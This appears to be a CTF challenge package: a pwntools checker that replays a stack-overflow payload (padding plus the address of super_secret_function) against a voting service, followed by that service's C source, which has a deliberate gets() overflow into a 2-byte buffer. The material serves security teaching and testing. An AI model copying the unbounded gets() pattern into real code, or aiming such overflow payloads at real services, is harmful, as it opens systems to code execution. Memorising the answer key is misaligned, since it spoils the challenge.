# This challenge is built around a simple stack buffer overflow (BOF): the unbounded gets(input) call in the service lets input overrun the buffer, which *can* then redirect code execution.
from pwn import *
import time
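def main(ip, port, flag):
    """Health-check the challenge service by replaying the reference solution.

    Connects to ``ip:port``, sends the reference input for the gets()
    overflow, waits for the service to answer and checks whether ``flag``
    appears in the reply.

    Args:
        ip: Host name or address of the challenge service.
        port: TCP port of the challenge service.
        flag: Flag text the service is expected to print.

    Exits the process with status 0 when the flag is found in the reply and
    with status 1 otherwise, including on any connection or I/O error.
    """
    conn = None
    try:
        conn = remote(ip, port)
        # Sent as bytes so the data on the wire does not depend on pwntools'
        # implicit str-to-bytes conversion.
        # We pad with 10 A's, then append the address execution should be
        # redirected to (0000000000400807, super_secret_function).
        conn.sendline(b"A"*10 + b"\x07\x08\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
        # Give the service time to produce its full reply before the single read.
        time.sleep(4)
        response = b"" + conn.recv()
        print("Response: " + str(response))
        # Compare bytes with bytes. Matching against str(response) would search
        # the repr ("b'...'"), so a flag such as "b" or "'" matched the wrapper
        # itself and any escaped character could never match.
        needle = flag if isinstance(flag, bytes) else str(flag).encode()
        found = needle in response
    except Exception as e:
        print("fail due to ")
        print(e)
        raise SystemExit(1)
    finally:
        # Always release the socket; the original left it open on every path.
        if conn is not None:
            conn.close()

    if found:
        print("Correct")
        raise SystemExit(0)
    print("Incorrect")
    raise SystemExit(1)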
#Validation section
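# Read the expected flag and the service address from stdin, then run the check.
flag = input("Flag: ").replace("\n", "")
# Split on the last colon only, so a host that itself contains colons
# (for example an IPv6 literal) still parses as host + port.
ip, port = input("service: ").rsplit(":", 1)
main(str(ip), int(port), str(flag))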
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <unistd.h>
#include <signal.h>
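/*
 * Print the contents of /home/ctf/flag.txt to stdout and terminate.
 *
 * No code shown in this file calls this function, so it is only reachable
 * if control flow is diverted into it.
 *
 * Exits with status 1 when the flag file cannot be opened, 0 otherwise.
 */
void super_secret_function(){
    FILE *f;
    /* int, not char: fgetc() returns an int so that EOF stays distinct from
       every valid byte. With a char, byte 0xFF can be mistaken for EOF, and
       where char is unsigned the loop never terminates. */
    int c;

    f = fopen("/home/ctf/flag.txt", "r");
    if(f == NULL){
        printf("Cannot open flag.txt\n");
        exit(1);
    }
    while((c = fgetc(f)) != EOF){
        putchar(c);
    }
    fclose(f);
    /* exit() flushes stdout, so the flag reaches the client before the
       process ends. */
    exit(0);
}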
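/*
 * SIGALRM handler: ends the process with status 0 when the alarm armed in
 * main() fires.
 */
void sig(int sign){
    (void)sign; /* signal number is not needed */
    /* _exit() is async-signal-safe; exit() is not, because it runs atexit
       handlers and flushes stdio, which may be mid-update when the signal
       arrives. Any output still buffered at that point is discarded. */
    _exit(0);
}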
/*
 * Entry point of the voting service: prints a banner and a prompt, reads one
 * line from stdin and thanks the user.
 *
 * NOTE(review): the gets() call below is an unbounded read into a 2-byte
 * stack buffer. This is presumably deliberate (the accompanying checker
 * script describes the challenge as a gets() overflow), so the code is left
 * unchanged and only documented here.
 */
int main(){
    /* Session timeout: alarm(40) delivers SIGALRM after 40 seconds, and
       sig() handles it by exiting. */
    signal(SIGALRM, sig);
    alarm(40);
    /* Room for one character plus the terminating NUL. The advertised vote
       "10" already needs three bytes. */
    char input[2];
    /* \e is a non-standard (GNU) escape for ESC; ESC[3m / ESC[23m switch
       italics on and off around "our". */
    printf("Hello and welcome to \e[3mour\e[23m voting application!\n");
    printf("Today's vote will be regarding the administration of\n");
    printf("watevr CTF.\n");
    printf("the voting range is 0 to 10. 0 being the worst possible and 10 being the best possible.\n");
    printf("Thanks!\n");
    printf("Vote: ");
    /* Flush so the prompt is sent before the process blocks on input. */
    fflush(stdout);
    /* gets() takes no length argument, so any line longer than one character
       is written past the end of input[] onto the rest of the stack frame.
       gets() was removed from the language in C11; the bounded equivalent is
       fgets(input, sizeof input, stdin). */
    gets(input);
    printf("Thanks for voting!\n");
    return 0;
}